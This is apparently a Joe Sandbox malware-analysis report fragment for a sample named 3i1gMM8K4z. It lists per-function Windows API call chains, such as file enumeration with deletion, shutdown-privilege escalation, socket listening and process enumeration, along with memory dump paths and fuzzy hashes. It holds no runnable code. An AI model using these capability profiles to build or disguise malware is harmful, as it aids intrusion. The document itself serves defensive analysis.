                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00F72BEC,?), ref: 00F5846E
                                                                                                                            • IIDFromString.OLE32(?,?), ref: 00F584E1
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00F5857B
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00F585DC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                            • API String ID: 834269672-1287834457
                                                                                                                            • Opcode ID: 5ae5308bd05297f5f980838387490de364d3ffbb1514d647f4e374dc50699c8f
                                                                                                                            • Instruction ID: 9d3894873221ee6fbf195412535d337fdcc2c2e6c3faaa643ebc7f3dc2506d55
                                                                                                                            • Opcode Fuzzy Hash: 5ae5308bd05297f5f980838387490de364d3ffbb1514d647f4e374dc50699c8f
                                                                                                                            • Instruction Fuzzy Hash: DB61F4716083119FC710DF14C848F6EB7E4AF457A5F040419FE82AB2A1DB70ED4AEB92
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1737998785-0
                                                                                                                            • Opcode ID: 60da160b1b148e7f788e6e55f0bac493ca40b4447b109d692cdebbcfbbca2389
                                                                                                                            • Instruction ID: 5544a5660a1a763acc251305ce37c65e9d5b4ff560429674d5d44ba3091f819b
                                                                                                                            • Opcode Fuzzy Hash: 60da160b1b148e7f788e6e55f0bac493ca40b4447b109d692cdebbcfbbca2389
                                                                                                                            • Instruction Fuzzy Hash: 5021D3756006189FDB01AF60EC09B6D7BE8FF05725F108029FA56DB2B1CBB1AC44EB55
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE4743,?,?,00EE37AE,?), ref: 00EE4770
                                                                                                                              • Part of subcall function 00F44A31: GetFileAttributesW.KERNEL32(?,00F4370B), ref: 00F44A32
                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F438A3
                                                                                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F4394B
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00F4395E
                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F4397B
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F4399D
                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F439B9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                            • String ID: \*.*
                                                                                                                            • API String ID: 4002782344-1173974218
                                                                                                                            • Opcode ID: 31ee4193f3ca502fcfc5e87fab8964766255ac715c602c5ebae4b22ea04ee227
                                                                                                                            • Instruction ID: 2485212aec3cf75bf8d3e4a7a59011e6924446c186e4237955e4ff0570f15a61
                                                                                                                            • Opcode Fuzzy Hash: 31ee4193f3ca502fcfc5e87fab8964766255ac715c602c5ebae4b22ea04ee227
                                                                                                                            • Instruction Fuzzy Hash: 1051B131C0418DAACF01EBA1DD929EDBBB9AF14314F600069E852B7192EF716F0DDB61
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F4F440
                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00F4F470
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F484
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F49F
                                                                                                                            • FindNextFileW.KERNEL32(?,?), ref: 00F4F53D
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F553
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 713712311-438819550
                                                                                                                            • Opcode ID: a4b69a22057134a0cfec593fbdf07286d8622fc121458f9a02b941a50a0f76e7
                                                                                                                            • Instruction ID: 13a02dbebee38f55d6a667bceb4c63fba3b8784e0156560db7141f1c4676180f
                                                                                                                            • Opcode Fuzzy Hash: a4b69a22057134a0cfec593fbdf07286d8622fc121458f9a02b941a50a0f76e7
                                                                                                                            • Instruction Fuzzy Hash: 7B415C71D0025EABDF14DF64DC45AEEBBB8FF05320F144466E859A21A1EB309E89EB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __itow__swprintf
                                                                                                                            • String ID: 3c$_
                                                                                                                            • API String ID: 674341424-4099079164
                                                                                                                            • Opcode ID: e74f4a2e69da9990464ae4f5db5656ec1e7cca37f65dcb89c677c9e82c148a51
                                                                                                                            • Instruction ID: 58fc99230d59c81cbe2825e1dffc56dc178d4957375c2627c7d807d739013a35
                                                                                                                            • Opcode Fuzzy Hash: e74f4a2e69da9990464ae4f5db5656ec1e7cca37f65dcb89c677c9e82c148a51
                                                                                                                            • Instruction Fuzzy Hash: 8122BC716083549FC724DF24D881BAEB7E4AF84714F10592DFA9AA7291DB31EE04CB92
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID:
• API String ID: 4104443479-0
• Opcode ID: a2895dc2a558d69fdb9fba5534730451fcded620af39317cd39f01002f174996
• Instruction ID: 7849f4c6414b195b017c2a23fa1afb525b5d19967810723b833f7dd2faff7720
• Opcode Fuzzy Hash: a2895dc2a558d69fdb9fba5534730451fcded620af39317cd39f01002f174996
• Instruction Fuzzy Hash: CE129971A0060DDBDF08DFA5D991AEEB7F5FF88310F10456AE906B7290EB35A910DB60
APIs
  • Part of subcall function 00EE4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE4743,?,?,00EE37AE,?), ref: 00EE4770
  • Part of subcall function 00F44A31: GetFileAttributesW.KERNEL32(?,00F4370B), ref: 00F44A32
• FindFirstFileW.KERNEL32(?,?), ref: 00F43B89
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00F43BD9
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00F43BEA
• FindClose.KERNEL32(00000000), ref: 00F43C01
• FindClose.KERNEL32(00000000), ref: 00F43C0A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: e3f5b6022915981e47f3e1bc59c4232b981de0fda242167ac3ce7b5cb760cb1c
• Instruction ID: f9e3f00722fde3b214c790978b9abe3ab1577158383b0974ccef2c2232ff118d
• Opcode Fuzzy Hash: e3f5b6022915981e47f3e1bc59c4232b981de0fda242167ac3ce7b5cb760cb1c
• Instruction Fuzzy Hash: 6431A37100C3899BC301EF64D8919AFBBE8BE95314F401D2DF9E6A2191EB21DA0CDB53
APIs
  • Part of subcall function 00F387E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F3882B
  • Part of subcall function 00F387E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F38858
  • Part of subcall function 00F387E1: GetLastError.KERNEL32 ref: 00F38865
• ExitWindowsEx.USER32(?,00000000), ref: 00F451F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
• Opcode ID: b5f1b26bdfee12029b9f682881499c3084238502e4432fb06f0cae4ed18a34cc
• Instruction ID: 1bd36aa6ab712cd7c7980166c44b8208542286a933e021c7838cfda84b80f179
• Opcode Fuzzy Hash: b5f1b26bdfee12029b9f682881499c3084238502e4432fb06f0cae4ed18a34cc
• Instruction Fuzzy Hash: 2A019E32B916152BFB283278AC8BFBB7A58DB04F60F240422FD13E20C3DAD45E01B590
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F562DC
• WSAGetLastError.WSOCK32(00000000), ref: 00F562EB
• bind.WSOCK32(00000000,?,00000010), ref: 00F56307
• listen.WSOCK32(00000000,00000005), ref: 00F56316
• WSAGetLastError.WSOCK32(00000000), ref: 00F56330
• closesocket.WSOCK32(00000000,00000000), ref: 00F56344
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
• Opcode ID: cdbfe2680885c120e43f74d9941aec8679f30f141af8446a601c69f80527888c
• Instruction ID: ef486bbf123b6438a5334970ec8d5231b9a98396eed7cfcd3dcb95911b913ab1
• Opcode Fuzzy Hash: cdbfe2680885c120e43f74d9941aec8679f30f141af8446a601c69f80527888c
• Instruction Fuzzy Hash: 3D21C1316002089FCB00EF64DC45B6EB7E9EF44321F548168E926E73D2CBB0AC09EB51
APIs
  • Part of subcall function 00F00DB6: std::exception::exception.LIBCMT ref: 00F00DEC
  • Part of subcall function 00F00DB6: __CxxThrowException@8.LIBCMT ref: 00F00E01
• _memmove.LIBCMT ref: 00F30258
• _memmove.LIBCMT ref: 00F3036D
• _memmove.LIBCMT ref: 00F30414
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: _memmove$Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 1300846289-0
• Opcode ID: c9b61448f389ba39a5624c945d67f2530331b15b01100088832ef83744fa9600
• Instruction ID: 90c81b9924631779bfc468bf35006b6de2215f0fa2dec2d03bd8d061180fddfc
• Opcode Fuzzy Hash: c9b61448f389ba39a5624c945d67f2530331b15b01100088832ef83744fa9600
• Instruction Fuzzy Hash: 6202D171A00209DBCF04DF68D991ABE7BF5EF44310F14806AE90AEB295EF35D950EB91
APIs
  • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
• DefDlgProcW.USER32(?,?,?,?,?), ref: 00EE19FA
• GetSysColor.USER32(0000000F), ref: 00EE1A4E
• SetBkColor.GDI32(?,00000000), ref: 00EE1A61
  • Part of subcall function 00EE1290: DefDlgProcW.USER32(?,00000020,?), ref: 00EE12D8
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ColorProc$LongWindow
• String ID:
• API String ID: 3744519093-0
• Opcode ID: a05153b2284508ad345b79e71fa11c0e25917b071a69964f851a86d5960dbfdc
• Instruction ID: 7d5ae77faafd856815804df218105419622123c7f529e0362010a59ae31eb91d
• Opcode Fuzzy Hash: a05153b2284508ad345b79e71fa11c0e25917b071a69964f851a86d5960dbfdc
• Instruction Fuzzy Hash: EFA189B01025CCFAD628AB2B8C44EFF359CDF42395B14116EF542F6196CA399DC1B2B2
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00F4BCE6
• _wcscmp.LIBCMT ref: 00F4BD16
• _wcscmp.LIBCMT ref: 00F4BD2B
• FindNextFileW.KERNEL32(00000000,?), ref: 00F4BD3C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F4BD6C
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Find$File_wcscmp$CloseFirstNext
• String ID:
• API String ID: 2387731787-0
• Opcode ID: 4adcc1058ee8de7b770b611a7fe7e8269a04276278764ada14cd933477d8e3c5
• Instruction ID: 4fb9208841fc7cdbf3fe7292d26c7939dc10d4055e06770457eb4854eda2c358
• Opcode Fuzzy Hash: 4adcc1058ee8de7b770b611a7fe7e8269a04276278764ada14cd933477d8e3c5
• Instruction Fuzzy Hash: 4551AD75A046029FC718DF68D890EAAB7F8EF49324F04455DE9568B3A2DB30ED04EB91
APIs
  • Part of subcall function 00F57D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F57DB6
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F5679E
• WSAGetLastError.WSOCK32(00000000), ref: 00F567C7
• bind.WSOCK32(00000000,?,00000010), ref: 00F56800
• WSAGetLastError.WSOCK32(00000000), ref: 00F5680D
• closesocket.WSOCK32(00000000,00000000), ref: 00F56821
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• API String ID: 99427753-0
• Opcode ID: 6cf79cbcae66b5b6f5ebf23dbc8186b33317458b2b64ffad16d3c1e6ac2e8ea5
• Instruction ID: dc56dd3adce3065695d1f90e38f1e2f1789eae52201cc814f0bc0b27878998e7
• Opcode Fuzzy Hash: 6cf79cbcae66b5b6f5ebf23dbc8186b33317458b2b64ffad16d3c1e6ac2e8ea5
• Instruction Fuzzy Hash: 7C41D475A002086FDB10BF259C86F2E77E8DF49724F448468FA59BB3D3CA709D049792
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 292994002-0
                                                                                                                            • Opcode ID: 073b22231678ad4268a7a5f375a88e0e5d9c682a7fcabd18a677fd56d0077948
                                                                                                                            • Instruction ID: aa24c16aa1b98cc638c26f0f69c59d9e54a48593de160934da284cedf7c7577c
                                                                                                                            • Opcode Fuzzy Hash: 073b22231678ad4268a7a5f375a88e0e5d9c682a7fcabd18a677fd56d0077948
                                                                                                                            • Instruction Fuzzy Hash: 5511B2327009156BDB215F26DC45A6B7BD9FF45BA1F444029F846E7251CBB0DC01A6A4
                                                                                                                            APIs
                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F380C0
                                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F380CA
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F380D9
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F380E0
                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F380F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 44706859-0
                                                                                                                            • Opcode ID: 47bb84bbc3aaab419376c99d1d870ec7df56c5d81939e59537e6141d3bdb7594
                                                                                                                            • Instruction ID: 2bd40009f5cdbbc692a83b18e7024fbdf69b5f03a7f7a04bbaf415c7be7aecec
                                                                                                                            • Opcode Fuzzy Hash: 47bb84bbc3aaab419376c99d1d870ec7df56c5d81939e59537e6141d3bdb7594
                                                                                                                            • Instruction Fuzzy Hash: 92F06271244308BFEB101FA5EC8DE673BACFF8A7A5F000025F955C6150CBA59C46FA60
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00EE4AD0), ref: 00EE4B45
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EE4B57
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                            • API String ID: 2574300362-192647395
                                                                                                                            • Opcode ID: 897dcc255c33e8aa7af93b964e80ceea64a60038bb351cb49af551146acbaf19
                                                                                                                            • Instruction ID: 805da18b61a0c708a4423e73309299b84411e2552424b488bd55479a7ab531ed
                                                                                                                            • Opcode Fuzzy Hash: 897dcc255c33e8aa7af93b964e80ceea64a60038bb351cb49af551146acbaf19
                                                                                                                            • Instruction Fuzzy Hash: A4D0C770E00B1BCFC7208F32F828B0272E4AF42388B10983AD492E2190E6B0E884DA14
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00F5EE3D
                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00F5EE4B
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00F5EF0B
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F5EF1A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
